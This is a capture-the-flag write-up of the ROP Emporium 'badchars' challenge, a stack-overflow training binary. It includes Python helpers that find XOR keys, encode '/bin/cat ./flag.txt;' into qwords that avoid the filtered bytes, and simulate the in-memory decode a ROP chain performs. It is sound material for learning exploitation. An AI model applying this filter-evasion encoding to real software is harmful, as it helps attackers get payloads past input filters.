badchars
Analysis
So in this case we have a binary which, as usual, takes an input that overflows a stack buffer and gives us control of the saved return address (we won't be discussing how to find the offset, as that has been covered multiple times in the previous write-ups). However, this time there are certain characters that we cannot include in our input: if one of them is present, the binary will not run our chain and stops execution in the middle.
$ ./badchars
badchars by ROP Emporium
64bits
badchars are: b i c / <space> f n s
>
So we cannot send many of the characters we would normally need in order to read the flag.txt file from the system. The hint for this challenge is to use XOR: we write the XORed string into memory with gadgets, as we did in write4, and then XOR it again in place to recover the original string, so that the input we provide to the program never contains a bad character.
So the procedure we'll follow is: first, load the XORed string into memory using the write gadgets; then XOR it back in place with gadgets to get the desired string; and finally call system with the address of that string as its parameter to read the flag.
I wrote a helper script to find every single-byte XOR key that is not itself a bad character and that leaves no bad character in the string once the string has been XORed with it.
import string

badchars = [" ", "b", "i", "c", "/", "f", "n", "s"]
flag_text = "/bin/cat ./flag.txt;"

# candidate keys: printable letters and punctuation, minus the bad characters themselves
all_letters = set(string.ascii_letters).union(set(string.punctuation))
valid_xor = all_letters - set(badchars)

for val in sorted(valid_xor):
    # XOR every character of the command with this single-byte key
    sample = ''.join([chr(ord(ch) ^ ord(val)) for ch in flag_text])
    # keep the key only if the encoded string contains no bad character
    if not set(sample).intersection(set(badchars)):
        print("XOR value =", val)
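Once a key is chosen, the remaining work is to turn the encoded string into the qwords that the write gadget stores, check that no byte of those qwords is a bad character, and make sure the in-place XOR really recovers the command. The following is an added example that is not part of the original write-up and not ROP Emporium's code: it extends the key search to every non-zero byte value (a key only has to be popped into a register, so it need not be printable, assuming the program reads our input raw), packs the encoded command into 8-byte little-endian chunks for a 64-bit write gadget, and simulates the store-then-XOR decode the ROP chain performs. Gadget addresses are not shown because the page does not list them; `find_keys`, `encode_chunks`, `payload_has_badchar` and `simulate_decode` are names chosen here, and padding with the key byte itself is a design choice of this example (each pad byte decodes to 0x00, which terminates the command string for system).

```python
BADCHARS = b" bic/fns"          # the bytes the binary rejects (from its banner)
CMD = b"/bin/cat ./flag.txt;"   # the command we want system() to see after decoding


def find_keys(cmd: bytes, badchars: bytes) -> list:
    """Return every key 1..255 that is not itself a bad character and
    leaves no bad character in cmd XOR key (every byte is tried, not
    only printable ones)."""
    keys = []
    for k in range(1, 256):
        if k in badchars:
            continue
        enc = bytes(c ^ k for c in cmd)
        if any(b in badchars for b in enc):
            continue
        keys.append(k)
    return keys


def encode_chunks(cmd: bytes, key: int) -> list:
    """XOR cmd with key, pad to a multiple of 8 with the key byte itself
    (it decodes to 0x00 and so NUL-terminates the string), and split the
    result into the little-endian qwords a 64-bit write gadget stores."""
    enc = bytes(c ^ key for c in cmd)
    pad = (-len(enc)) % 8
    enc += bytes([key]) * pad                      # key is not a bad char, so pad bytes are safe
    return [int.from_bytes(enc[i:i + 8], "little") for i in range(0, len(enc), 8)]


def payload_has_badchar(chunks: list, badchars: bytes) -> bool:
    """True if any byte that would appear in the chain (the packed qwords)
    is a bad character; such a payload must not be sent."""
    raw = b"".join(c.to_bytes(8, "little") for c in chunks)
    return any(b in badchars for b in raw)


def simulate_decode(chunks: list, key: int) -> bytes:
    """Model what the ROP chain does in memory: store each qword (the
    write gadget), then XOR every byte in place with the key (one
    xor-byte gadget call per byte) and return the resulting C string."""
    mem = bytearray()
    for c in chunks:
        mem += c.to_bytes(8, "little")   # mov qword [addr], reg
    for i in range(len(mem)):
        mem[i] ^= key                     # xor byte [addr + i], key
    return bytes(mem).split(b"\x00", 1)[0]


if __name__ == "__main__":
    keys = find_keys(CMD, BADCHARS)
    print("usable keys:", [hex(k) for k in keys])
    key = keys[0]
    chunks = encode_chunks(CMD, key)
    assert not payload_has_badchar(chunks, BADCHARS)
    print("qwords to write:", [hex(c) for c in chunks])
    print("decoded in memory:", simulate_decode(chunks, key))
```

The number of xor-byte gadget invocations equals the padded length of the string, so a shorter command (or a larger write width) shortens the chain; the check in `payload_has_badchar` runs over the packed qwords rather than the string because it is the bytes of the chain, not the logical string, that pass through the program's filter.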